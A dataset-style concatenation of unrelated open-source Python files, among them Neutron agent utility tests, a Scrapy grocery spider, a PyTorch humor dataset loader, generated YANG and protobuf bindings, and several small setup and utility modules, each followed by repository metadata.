"""
Product = Pool().get('product.product')
with Transaction().set_context(**self.get_availability_context()):
rv = {'type': 'bucket', 'value': None, 'quantity': None}
if self.product:
product = Product(self.product.id)
rv['quantity'] = product.quantity
if rv['quantity'] > 0:
rv['value'] = 'in_stock'
else:
rv['value'] = 'out_of_stock'
return rv
| 31.224543 | 93 | 0.619199 | [
"BSD-3-Clause"
] | aniforprez/trytond-sale-channel | product.py | 11,959 | Python |
# Copyright 2012, VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import testtools
from neutron.agent.linux import utils
from neutron.tests import base
_marker = object()
class AgentUtilsExecuteTest(base.BaseTestCase):
def setUp(self):
super(AgentUtilsExecuteTest, self).setUp()
self.test_file = self.get_temp_file_path('test_execute.tmp')
open(self.test_file, 'w').close()
self.process = mock.patch('eventlet.green.subprocess.Popen').start()
self.process.return_value.returncode = 0
self.mock_popen = self.process.return_value.communicate
def test_without_helper(self):
expected = "%s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
result = utils.execute(["ls", self.test_file])
self.assertEqual(result, expected)
def test_with_helper(self):
expected = "ls %s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
self.config(group='AGENT', root_helper='echo')
result = utils.execute(["ls", self.test_file], run_as_root=True)
self.assertEqual(result, expected)
def test_stderr_true(self):
expected = "%s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
out = utils.execute(["ls", self.test_file], return_stderr=True)
self.assertIsInstance(out, tuple)
self.assertEqual(out, (expected, ""))
def test_check_exit_code(self):
self.mock_popen.return_value = ["", ""]
stdout = utils.execute(["ls", self.test_file[:-1]],
check_exit_code=False)
self.assertEqual(stdout, "")
def test_execute_raises(self):
self.mock_popen.side_effect = RuntimeError
self.assertRaises(RuntimeError, utils.execute,
["ls", self.test_file[:-1]])
def test_process_input(self):
expected = "%s\n" % self.test_file[:-1]
self.mock_popen.return_value = [expected, ""]
result = utils.execute(["cat"], process_input="%s\n" %
self.test_file[:-1])
self.assertEqual(result, expected)
def test_with_addl_env(self):
expected = "%s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
result = utils.execute(["ls", self.test_file],
addl_env={'foo': 'bar'})
self.assertEqual(result, expected)
def test_return_code_log_error_raise_runtime(self):
self.mock_popen.return_value = ('', '')
self.process.return_value.returncode = 1
with mock.patch.object(utils, 'LOG') as log:
self.assertRaises(RuntimeError, utils.execute,
['ls'])
self.assertTrue(log.error.called)
def test_return_code_log_error_no_raise_runtime(self):
self.mock_popen.return_value = ('', '')
self.process.return_value.returncode = 1
with mock.patch.object(utils, 'LOG') as log:
utils.execute(['ls'], check_exit_code=False)
self.assertTrue(log.error.called)
def test_return_code_log_debug(self):
self.mock_popen.return_value = ('', '')
with mock.patch.object(utils, 'LOG') as log:
utils.execute(['ls'])
self.assertTrue(log.debug.called)
def test_return_code_raise_runtime_do_not_log_fail_as_error(self):
self.mock_popen.return_value = ('', '')
self.process.return_value.returncode = 1
with mock.patch.object(utils, 'LOG') as log:
self.assertRaises(RuntimeError, utils.execute,
['ls'], log_fail_as_error=False)
self.assertFalse(log.error.called)
class AgentUtilsGetInterfaceMAC(base.BaseTestCase):
def test_get_interface_mac(self):
expect_val = '01:02:03:04:05:06'
with mock.patch('fcntl.ioctl') as ioctl:
ioctl.return_value = ''.join(['\x00' * 18,
'\x01\x02\x03\x04\x05\x06',
'\x00' * 232])
actual_val = utils.get_interface_mac('eth0')
self.assertEqual(actual_val, expect_val)
class AgentUtilsReplaceFile(base.BaseTestCase):
def test_replace_file(self):
# make file to replace
with mock.patch('tempfile.NamedTemporaryFile') as ntf:
ntf.return_value.name = '/baz'
with mock.patch('os.chmod') as chmod:
with mock.patch('os.rename') as rename:
utils.replace_file('/foo', 'bar')
expected = [mock.call('w+', dir='/', delete=False),
mock.call().write('bar'),
mock.call().close()]
ntf.assert_has_calls(expected)
chmod.assert_called_once_with('/baz', 0o644)
rename.assert_called_once_with('/baz', '/foo')
class TestFindChildPids(base.BaseTestCase):
def test_returns_empty_list_for_exit_code_1(self):
with mock.patch.object(utils, 'execute',
side_effect=RuntimeError('Exit code: 1')):
self.assertEqual(utils.find_child_pids(-1), [])
def test_returns_empty_list_for_no_output(self):
with mock.patch.object(utils, 'execute', return_value=''):
self.assertEqual(utils.find_child_pids(-1), [])
def test_returns_list_of_child_process_ids_for_good_ouput(self):
with mock.patch.object(utils, 'execute', return_value=' 123 \n 185\n'):
self.assertEqual(utils.find_child_pids(-1), ['123', '185'])
def test_raises_unknown_exception(self):
with testtools.ExpectedException(RuntimeError):
with mock.patch.object(utils, 'execute',
side_effect=RuntimeError()):
utils.find_child_pids(-1)
class TestGetRoothelperChildPid(base.BaseTestCase):
def _test_get_root_helper_child_pid(self, expected=_marker,
run_as_root=False, pids=None):
def _find_child_pids(x):
if not pids:
return []
pids.pop(0)
return pids
mock_pid = object()
with mock.patch.object(utils, 'find_child_pids',
side_effect=_find_child_pids):
actual = utils.get_root_helper_child_pid(mock_pid, run_as_root)
if expected is _marker:
expected = str(mock_pid)
self.assertEqual(expected, actual)
def test_returns_process_pid_not_root(self):
self._test_get_root_helper_child_pid()
def test_returns_child_pid_as_root(self):
self._test_get_root_helper_child_pid(expected='2', pids=['1', '2'],
run_as_root=True)
def test_returns_last_child_pid_as_root(self):
self._test_get_root_helper_child_pid(expected='3',
pids=['1', '2', '3'],
run_as_root=True)
def test_returns_none_as_root(self):
self._test_get_root_helper_child_pid(expected=None, run_as_root=True)
class TestPathUtilities(base.BaseTestCase):
def test_remove_abs_path(self):
self.assertEqual(['ping', '8.8.8.8'],
utils.remove_abs_path(['/usr/bin/ping', '8.8.8.8']))
def test_cmdlines_are_equal(self):
self.assertTrue(utils.cmdlines_are_equal(
['ping', '8.8.8.8'],
['/usr/bin/ping', '8.8.8.8']))
def test_cmdlines_are_equal_different_commands(self):
self.assertFalse(utils.cmdlines_are_equal(
['ping', '8.8.8.8'],
['/usr/bin/ping6', '8.8.8.8']))
| 40.252427 | 79 | 0.607212 | [
"Apache-2.0"
] | bradleyjones/neutron | neutron/tests/unit/agent/linux/test_utils.py | 8,292 | Python |
import logging
from urllib.parse import urljoin
import scrapy
from scrapy import Request
from scrapy_selenium import SeleniumRequest
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from sainsburys.items import SainsburysItem
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
class BasicSpider(scrapy.Spider):
name = 'basic'
allowed_domains = ['www.sainsburys.co.uk']
start_urls = ['https://www.sainsburys.co.uk/shop/gb/groceries/meat-fish']
def parse(self, response):
urls = response.css("ul.categories.departments li a::attr(href)").extract()
for url in urls:
yield response.follow(url, callback=self.parse_department)
def parse_department(self, response):
products = response.css("ul.productLister.gridView").extract()
if products:
for product in self.handle_product_listing(response):
yield product
pages = response.css("ul.categories.shelf li a::attr(href)").extract()
if not pages:
pages = response.css("ul.categories.aisles li a::attr(href)").extract()
if not pages:
return
for url in pages:
yield response.follow(url, callback=self.parse_department)
def handle_product_listing(self, response):
selector = 'button.ln-c-button'
urls = response.css("ul.productLister.gridView li.gridItem h3 a::attr(href)").extract()
for url in urls:
# yield response.follow(url, callback=self.parse_product)
yield SeleniumRequest(url=url, callback=self.parse_product, wait_time=10, wait_until=EC.element_to_be_clickable((By.CSS_SELECTOR, selector)))
next_page = response.css("#productLister > div.pagination.paginationBottom > ul > li.next > a::attr(href)").extract()
if next_page:
yield response.follow(next_page, callback=self.handle_product_listing)
def parse_product(self, response):
product_name = response.css("h1.pd__header::text").extract()[0]
product_image = response.css("img.pd__image::attr(src)").extract()[0]
item = SainsburysItem()
item["url"] = response.url
item["name"] = product_name
item["image"] = product_image
yield item
| 30.576923 | 153 | 0.667086 | [
"MIT"
] | carrasquel/scrapy-practice | sainsburys/sainsburys/spiders/basic.py | 2,385 | Python |
import pickle
import torch
from torch.utils.data import Dataset, DataLoader
import numpy as np
import torch.nn as nn
def load_pickle(pickle_file):
try:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f)
except UnicodeDecodeError as e:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f, encoding='latin1')
except Exception as e:
print('Unable to load data ', pickle_file, ':', e)
raise
return pickle_data
class HumorDataset(Dataset):
def __init__(self, id_list, max_context_len=5, max_sen_len=20):
self.id_list = id_list
openface_file = "openface_features_sdk.pkl"
covarep_file = "covarep_features_sdk.pkl"
language_file = "language_sdk.pkl"
word_embedding_list_file = "word_embedding_list.pkl"
humor_label_file = "humor_label_sdk.pkl"
self.word_aligned_openface_sdk = load_pickle(openface_file)
self.word_aligned_covarep_sdk = load_pickle(covarep_file)
self.language_sdk = load_pickle(language_file)
self.word_embedding_list_sdk = load_pickle(word_embedding_list_file)
self.humor_label_sdk = load_pickle(humor_label_file)
self.of_d = 371
self.cvp_d = 81
self.glove_d = 300
self.total_dim = self.glove_d + self.of_d + self.cvp_d
self.max_context_len = max_context_len
self.max_sen_len = max_sen_len
# left padding with zero vector upto maximum number of words in a sentence * glove embedding dimension
def paded_word_idx(self, seq, max_sen_len=20, left_pad=1):
seq = seq[0:max_sen_len]
pad_w = np.concatenate((np.zeros(max_sen_len - len(seq)), seq), axis=0)
pad_w = np.array([self.word_embedding_list_sdk[int(w_id)]
for w_id in pad_w])
return pad_w
# left padding with zero vector upto maximum number of words in a sentence * covarep dimension
def padded_covarep_features(self, seq, max_sen_len=20, left_pad=1):
seq = seq[0:max_sen_len]
return np.concatenate((np.zeros((max_sen_len - len(seq), self.cvp_d)), seq), axis=0)
# left padding with zero vector upto maximum number of words in a sentence * openface dimension
def padded_openface_features(self, seq, max_sen_len=20, left_pad=1):
seq = seq[0:max_sen_len]
return np.concatenate((np.zeros(((max_sen_len - len(seq)), self.of_d)), seq), axis=0)
# left padding with zero vectors upto maximum number of sentences in context * maximum num of words in a sentence * 456
def padded_context_features(self, context_w, context_of, context_cvp, max_context_len=5, max_sen_len=20):
context_w = context_w[-max_context_len:]
context_of = context_of[-max_context_len:]
context_cvp = context_cvp[-max_context_len:]
padded_context = []
for i in range(len(context_w)):
p_seq_w = self.paded_word_idx(context_w[i], max_sen_len)
p_seq_cvp = self.padded_covarep_features(
context_cvp[i], max_sen_len)
p_seq_of = self.padded_openface_features(
context_of[i], max_sen_len)
padded_context.append(np.concatenate(
(p_seq_w, p_seq_cvp, p_seq_of), axis=1))
pad_c_len = max_context_len - len(padded_context)
padded_context = np.array(padded_context)
# if there is no context
if not padded_context.any():
return np.zeros((max_context_len, max_sen_len, self.total_dim))
return np.concatenate((np.zeros((pad_c_len, max_sen_len, self.total_dim)), padded_context), axis=0)
def padded_punchline_features(self, punchline_w, punchline_of, punchline_cvp, max_sen_len=20, left_pad=1):
p_seq_w = self.paded_word_idx(punchline_w, max_sen_len)
p_seq_cvp = self.padded_covarep_features(punchline_cvp, max_sen_len)
p_seq_of = self.padded_openface_features(punchline_of, max_sen_len)
return np.concatenate((p_seq_w, p_seq_cvp, p_seq_of), axis=1)
def __len__(self):
return len(self.id_list)
def __getitem__(self, index):
hid = self.id_list[index]
punchline_w = np.array(
self.language_sdk[hid]['punchline_embedding_indexes'])
punchline_of = np.array(
self.word_aligned_openface_sdk[hid]['punchline_features'])
punchline_cvp = np.array(
self.word_aligned_covarep_sdk[hid]['punchline_features'])
context_w = np.array(
self.language_sdk[hid]['context_embedding_indexes'])
context_of = np.array(
self.word_aligned_openface_sdk[hid]['context_features'])
context_cvp = np.array(
self.word_aligned_covarep_sdk[hid]['context_features'])
# punchline feature
x_p = torch.LongTensor(
self.padded_punchline_features(punchline_w, punchline_of, punchline_cvp, self.max_sen_len))
# context feature
x_c = torch.LongTensor(
self.padded_context_features(context_w, context_of, context_cvp, self.max_context_len, self.max_sen_len))
y = torch.FloatTensor([self.humor_label_sdk[hid]])
return x_p, x_c, y
| 42.455285 | 127 | 0.677135 | [
"MIT"
] | HughMun/MultiBench | deprecated/dataloaders/affect/humor_dataset.py | 5,222 | Python |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "travel.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 34.956522 | 77 | 0.641791 | [
"MIT"
] | NaimJamalludin/Travelevart | travel/manage.py | 804 | Python |
class Solution:
def maxChunksToSorted(self, arr):
"""
:type arr: List[int]
:rtype: int
"""
stacks = []
for num in arr:
if not stacks:
stacks.append([num])
elif num >= stacks[-1][0]:
stacks.append([num])
else:
# num < stacks[-1][0]
stacks[-1].append(num)
while len(stacks) >= 2:
if num < stacks[-2][0]:
stacks[-2][0] = max(stacks[-2][0], stacks[-1][0])
stacks[-2].extend(stacks.pop())
else:
break
# print(stacks)
return len(stacks)
sol = Solution().maxChunksToSorted
print(sol([5, 4, 3, 2, 1]))
print(sol([2, 1, 3, 4, 4]))
print(sol([5, 3, 1, 2, 4]))
print(sol([1, 0, 1, 3, 2]))
print(sol([5, 1, 1, 8, 1, 6, 5, 9, 7, 8]))
| 28.71875 | 73 | 0.40914 | [
"MIT"
] | feigaochn/leetcode | p768_max_chunks_to_make_sorted_ii.py | 919 | Python |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class lsp_admin_group_include_any(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-lsp-extensive/output/lsp/show-mpls-lsp-extensive-info/show-mpls-lsp-sec-path-info/sec-path/lsp-sec-path-config-admin-groups/lsp-admin-group/lsp-admin-group-include-any. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_admin_group_include_any_group_id',)
_yang_name = 'lsp-admin-group-include-any'
_rest_name = 'lsp-admin-group-include-any'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__lsp_admin_group_include_any_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-lsp-extensive', u'output', u'lsp', u'show-mpls-lsp-extensive-info', u'show-mpls-lsp-sec-path-info', u'sec-path', u'lsp-sec-path-config-admin-groups', u'lsp-admin-group', u'lsp-admin-group-include-any']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-lsp-extensive', u'output', u'lsp', u'sec-path', u'lsp-sec-path-config-admin-groups', u'lsp-admin-group-include-any']
def _get_lsp_admin_group_include_any_group_id(self):
"""
Getter method for lsp_admin_group_include_any_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_extensive/output/lsp/show_mpls_lsp_extensive_info/show_mpls_lsp_sec_path_info/sec_path/lsp_sec_path_config_admin_groups/lsp_admin_group/lsp_admin_group_include_any/lsp_admin_group_include_any_group_id (uint32)
YANG Description: Include any admin group id
"""
return self.__lsp_admin_group_include_any_group_id
def _set_lsp_admin_group_include_any_group_id(self, v, load=False):
"""
Setter method for lsp_admin_group_include_any_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_extensive/output/lsp/show_mpls_lsp_extensive_info/show_mpls_lsp_sec_path_info/sec_path/lsp_sec_path_config_admin_groups/lsp_admin_group/lsp_admin_group_include_any/lsp_admin_group_include_any_group_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_admin_group_include_any_group_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_admin_group_include_any_group_id() directly.
YANG Description: Include any admin group id
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_admin_group_include_any_group_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_admin_group_include_any_group_id = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_admin_group_include_any_group_id(self):
self.__lsp_admin_group_include_any_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
lsp_admin_group_include_any_group_id = __builtin__.property(_get_lsp_admin_group_include_any_group_id, _set_lsp_admin_group_include_any_group_id)
_pyangbind_elements = {'lsp_admin_group_include_any_group_id': lsp_admin_group_include_any_group_id, }
| 57.295455 | 504 | 0.74838 | [
"Apache-2.0"
] | extremenetworks/pybind | pybind/slxos/v17r_1_01a/brocade_mpls_rpc/show_mpls_lsp_extensive/output/lsp/show_mpls_lsp_extensive_info/show_mpls_lsp_sec_path_info/sec_path/lsp_sec_path_config_admin_groups/lsp_admin_group/lsp_admin_group_include_any/__init__.py | 7,563 | Python |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: sprint.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from easy_work_service_sdk.model.topboard import product_basic_pb2 as easy__work__service__sdk_dot_model_dot_topboard_dot_product__basic__pb2
from easy_work_service_sdk.model.topboard import issue_basic_pb2 as easy__work__service__sdk_dot_model_dot_topboard_dot_issue__basic__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='sprint.proto',
package='topboard',
syntax='proto3',
serialized_options=_b('ZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboard'),
serialized_pb=_b('\n\x0csprint.proto\x12\x08topboard\x1a\x38\x65\x61sy_work_service_sdk/model/topboard/product_basic.proto\x1a\x36\x65\x61sy_work_service_sdk/model/topboard/issue_basic.proto\"\xca\x01\n\x06Sprint\x12\'\n\x07product\x18\x01 \x03(\x0b\x32\x16.topboard.ProductBasic\x12$\n\x06issues\x18\x02 \x03(\x0b\x32\x14.topboard.IssueBasic\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x12\n\ninstanceId\x18\x04 \x01(\t\x12\r\n\x05title\x18\x05 \x01(\t\x12\x0e\n\x06status\x18\x06 \x01(\t\x12\x0c\n\x04goal\x18\x07 \x01(\t\x12\x11\n\tstartTime\x18\x08 \x01(\t\x12\x0f\n\x07\x65ndTime\x18\t \x01(\tBDZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboardb\x06proto3')
,
dependencies=[easy__work__service__sdk_dot_model_dot_topboard_dot_product__basic__pb2.DESCRIPTOR,easy__work__service__sdk_dot_model_dot_topboard_dot_issue__basic__pb2.DESCRIPTOR,])
_SPRINT = _descriptor.Descriptor(
name='Sprint',
full_name='topboard.Sprint',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='topboard.Sprint.product', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='issues', full_name='topboard.Sprint.issues', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Sprint.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='topboard.Sprint.instanceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='title', full_name='topboard.Sprint.title', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='topboard.Sprint.status', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='goal', full_name='topboard.Sprint.goal', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='startTime', full_name='topboard.Sprint.startTime', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='endTime', full_name='topboard.Sprint.endTime', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=141,
serialized_end=343,
)
_SPRINT.fields_by_name['product'].message_type = easy__work__service__sdk_dot_model_dot_topboard_dot_product__basic__pb2._PRODUCTBASIC
_SPRINT.fields_by_name['issues'].message_type = easy__work__service__sdk_dot_model_dot_topboard_dot_issue__basic__pb2._ISSUEBASIC
DESCRIPTOR.message_types_by_name['Sprint'] = _SPRINT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Sprint = _reflection.GeneratedProtocolMessageType('Sprint', (_message.Message,), {
'DESCRIPTOR' : _SPRINT,
'__module__' : 'sprint_pb2'
# @@protoc_insertion_point(class_scope:topboard.Sprint)
})
_sym_db.RegisterMessage(Sprint)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 46.699248 | 677 | 0.7564 | [
"Apache-2.0"
] | easyopsapis/easyops-api-python | easy_work_service_sdk/model/topboard/sprint_pb2.py | 6,211 | Python |
from abc import ABC, abstractmethod
from typing import Tuple, Dict
from kloppy.infra.utils import Readable
from kloppy.domain import Dataset
class TrackingDataSerializer(ABC):
@abstractmethod
def deserialize(
self, inputs: Dict[str, Readable], options: Dict = None
) -> Dataset:
raise NotImplementedError
@abstractmethod
def serialize(self, dataset: Dataset) -> Tuple[str, str]:
raise NotImplementedError
| 25.166667 | 63 | 0.719647 | [
"BSD-3-Clause"
] | FCrSTATS/kloppy | kloppy/infra/serializers/tracking/base.py | 453 | Python |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import compas_rhino
from compas.utilities import iterable_like
from compas_rhino.artists._primitiveartist import PrimitiveArtist
__all__ = ['LineArtist']
class LineArtist(PrimitiveArtist):
"""Artist for drawing lines.
Parameters
----------
primitive : :class:`compas.geometry.Line`
A COMPAS line.
Notes
-----
See :class:`compas_rhino.artists.PrimitiveArtist` for all other parameters.
"""
def draw(self):
"""Draw the line.
Returns
-------
list
The GUIDs of the created Rhino objects.
"""
start = list(self.primitive.start)
end = list(self.primitive.end)
lines = [{'start': start, 'end': end, 'color': self.color, 'name': self.name}]
guids = compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
@staticmethod
def draw_collection(collection, names=None, colors=None, layer=None, clear=False, add_to_group=False, group_name=None):
"""Draw a collection of lines.
Parameters
----------
collection: list of compas.geometry.Line
A collection of ``Line`` objects.
names : list of str, optional
Individual names for the lines.
colors : color or list of color, optional
A color specification for the lines as a single color or a list of individual colors.
layer : str, optional
A layer path.
clear : bool, optional
Clear the layer before drawing.
add_to_group : bool, optional
Add the frames to a group.
group_name : str, optional
Name of the group.
Returns
-------
guids: list
A list of GUIDs if the collection is not grouped.
groupname: str
The name of the group if the collection objects are grouped.
"""
lines = [{'start': list(line[0]), 'end': list(line[1])} for line in collection]
if colors:
if isinstance(colors[0], (int, float)):
colors = iterable_like(collection, [colors], colors)
else:
colors = iterable_like(collection, colors, colors[0])
for line, rgb in zip(lines, colors):
line['color'] = rgb
if names:
if isinstance(names, basestring):
names = iterable_like(collection, [names], names)
else:
names = iterable_like(collection, names, names[0])
for line, name in zip(lines, names):
line['name'] = name
guids = compas_rhino.draw_lines(lines, layer=layer, clear=clear)
if not add_to_group:
return guids
group = compas_rhino.rs.AddGroup(group_name)
if group:
compas_rhino.rs.AddObjectsToGroup(guids, group)
return group
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
| 30.62037 | 123 | 0.566979 | [
"MIT"
] | KEERTHANAUDAY/compas | src/compas_rhino/artists/lineartist.py | 3,307 | Python |
# Copyright (C) 2021 Xilinx, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is used to configure your project.
# Read more about the various options under:
# http://setuptools.readthedocs.io/en/latest/setuptools.html#configuring-setup-using-setup-cfg-files
# -*- coding: utf-8 -*-
"""
Setup file for logicnets.
Use setup.cfg to configure your project.
This file was generated with PyScaffold 3.2.3.
PyScaffold helps you to put up the scaffold of your new Python project.
Learn more under: https://pyscaffold.org/
"""
import sys
from pkg_resources import VersionConflict, require
from setuptools import setup
try:
require('setuptools>=38.3')
except VersionConflict:
print("Error: version of setuptools is too old (<38.3)!")
sys.exit(1)
if __name__ == "__main__":
setup(use_pyscaffold=True)
